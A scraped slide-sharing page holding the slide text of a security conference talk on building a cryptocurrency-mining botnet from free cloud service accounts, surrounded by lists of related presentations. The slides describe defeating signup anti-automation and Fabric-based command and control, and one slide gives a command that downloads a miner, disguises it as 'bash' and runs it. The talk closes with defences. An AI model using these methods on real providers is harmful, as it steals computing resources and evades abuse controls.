Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Bahtiyar Bircan
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Matt Lucas
 
Blockchain for Business
Blockchain for BusinessBlockchain for Business
Blockchain for BusinessAhmad Gohar
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Benjamin Fuentes
 

Similar to CloudBots - Harvesting Crypto Currency Like a Botnet Farmer (20)

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBlack Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpc
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaS
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and Blockchain
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
 
From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to Serverless
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdf
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)
 
Blockchain for Business
Blockchain for BusinessBlockchain for Business
Blockchain for Business
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)
 

More from Rob Ragan

Nbt hacker fight
Nbt hacker fightNbt hacker fight
Nbt hacker fightRob Ragan
 
Expose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsExpose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsRob Ragan
 
DeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadDeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadRob Ragan
 
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingInterop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingRob Ragan
 
Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Rob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 

More from Rob Ragan (7)

Nbt hacker fight
Nbt hacker fightNbt hacker fight
Nbt hacker fight
 
Expose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsExpose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach Patterns
 
DeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadDeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than Dead
 
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingInterop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
 
Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 

Recently uploaded

Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 

Recently uploaded (20)

Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  • 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 4. 4 Platform as a Service Cloud PaaS
  • 5. 5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
  • 6. 6 Development Environment as a Service Free Cloud Services
  • 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  • 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  • 11. 11
  • 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
  • 19. 19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
  • 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  • 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  • 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
  • 30. 30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  • 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  • 32. 32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  • 33. 33 All your processors are belong to us Litecoin Mining
  • 35. DETECTION No one can catch a ninja!
  • 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 41. 41 Crypto Coins & DDoS Clouds Under Siege
  • 42. 42 Crypto Coins & DDoS Clouds Under Siege
  • 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM